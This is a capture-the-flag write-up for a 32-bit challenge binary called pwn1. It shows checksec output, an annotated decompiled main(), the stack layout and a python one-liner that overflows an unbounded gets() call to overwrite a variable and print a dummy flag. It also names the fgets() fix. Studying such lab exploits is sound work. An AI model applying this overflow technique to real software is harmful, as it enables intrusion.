Pwn1
$ file pwn1
pwn1: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 3.2.0, BuildID[sha1]=d126d8e3812dd7aa1accb16feac888c99841f504, not stripped
$ checksec.sh --file pwn1
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Full RELRO      No canary found   NX enabled    PIE enabled     No RPATH   No RUNPATH   pwn1
/*
 * Decompiled main() of pwn1 (decompiler output, reformatted; tokens unchanged).
 *
 * Three prompts are answered from stdin. The first two answers are read with
 * a bounded fgets(43) and compared against fixed strings; the third is read
 * with gets(), which imposes no length limit. Per the stack listing below,
 * s starts at ebp-0x3B and v5 at ebp-0x10, i.e. 43 bytes above s, so a third
 * answer longer than 43 bytes writes over v5 -- the variable that gates
 * print_flag(). checksec reports no stack canary, so nothing detects the
 * overwrite before the comparison.
 *
 * Mitigation: read the third answer with the same bounded fgets() already
 * used for the first two, so input can never reach v5.
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
    char s;      // [esp+1h] [ebp-3Bh]  -- shown as one byte; used as the 43-byte input buffer
    int v5;      // [esp+2Ch] [ebp-10h] -- "secret" value compared against 0xDEA110C8
    int v6;      // [esp+30h] [ebp-Ch]  -- set to 2, never read in this listing
    int *v7;     // [esp+34h] [ebp-8h]  -- holds &argc, never read in this listing

    v7 = &argc;
    // NOTE(review): second argument looks like a decompiler artifact; likely
    // setvbuf(stdout, NULL, _IONBF, 0) -- confirm against the disassembly.
    setvbuf(stdout, (char *)&dword_0 + 2, 0, 0);
    v6 = 2;
    // v5 starts at 0 and no code path assigns it again; only an out-of-bounds
    // write into s can make the later comparison succeed.
    v5 = 0;

    puts("Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.");

    // Question 1: bounded read (at most 42 chars + NUL), exact-string match.
    puts("What... is your name?");
    fgets(&s, 43, stdin);
    if ( strcmp(&s, "Sir Lancelot of Camelot\n") )
    {
        puts("I don't know that! Auuuuuuuugh!");
        exit(0);
    }

    // Question 2: same bounded read and exact match, reusing the buffer s.
    puts("What... is your quest?");
    fgets(&s, 43, stdin);
    if ( strcmp(&s, "To seek the Holy Grail.\n") )
    {
        puts("I don't know that! Auuuuuuuugh!");
        exit(0);
    }

    // Question 3: unbounded gets() into the same 43-byte region -- this is the
    // stack buffer overflow; bytes 44.. land on v5 (ebp-0x10).
    puts("What... is my secret?");
    gets(&s);
    if ( v5 == 0xDEA110C8 )
        print_flag();
    else
        puts("I don't know that! Auuuuuuuugh!");
    return 0;
}
$ ./pwn1 Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see. What... is your name? Sir Lancelot of Camelot What... is your quest? To seek the Holy Grail. What... is my secret? a I don't know that! Auuuuuuuugh!
stack
-0000003B s db ? -0000003A db ? ; undefined -00000039 db ? ; undefined -00000038 db ? ; undefined -00000037 db ? ; undefined -00000036 db ? ; undefined -00000035 db ? ; undefined -00000034 db ? ; undefined -00000033 db ? ; undefined -00000032 db ? ; undefined -00000031 db ? ; undefined -00000030 db ? ; undefined -0000002F db ? ; undefined -0000002E db ? ; undefined -0000002D db ? ; undefined -0000002C db ? ; undefined -0000002B db ? ; undefined -0000002A db ? ; undefined -00000029 db ? ; undefined -00000028 db ? ; undefined -00000027 db ? ; undefined -00000026 db ? ; undefined -00000025 db ? ; undefined -00000024 db ? ; undefined -00000023 db ? ; undefined -00000022 db ? ; undefined -00000021 db ? ; undefined -00000020 db ? ; undefined -0000001F db ? ; undefined -0000001E db ? ; undefined -0000001D db ? ; undefined -0000001C db ? ; undefined -0000001B db ? ; undefined -0000001A db ? ; undefined -00000019 db ? ; undefined -00000018 db ? ; undefined -00000017 db ? ; undefined -00000016 db ? ; undefined -00000015 db ? ; undefined -00000014 db ? ; undefined -00000013 db ? ; undefined -00000012 db ? ; undefined -00000011 db ? ; undefined -00000010 var_10 dd ?
0x3B − 0x10 = 43: the buffer `s` (ebp-0x3B) lies exactly 43 bytes below `var_10`/`v5` (ebp-0x10), which is the bound the two `fgets` calls respect and the one `gets` does not.
$ python -c "print 'Sir Lancelot of Camelot\nTo seek the Holy Grail.\n' + 'A' * 43 + '\xc8\x10\xa1\xde'" | ./pwn1 Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see. What... is your name? What... is your quest? What... is my secret? Right. Off you go. this is dummy flag $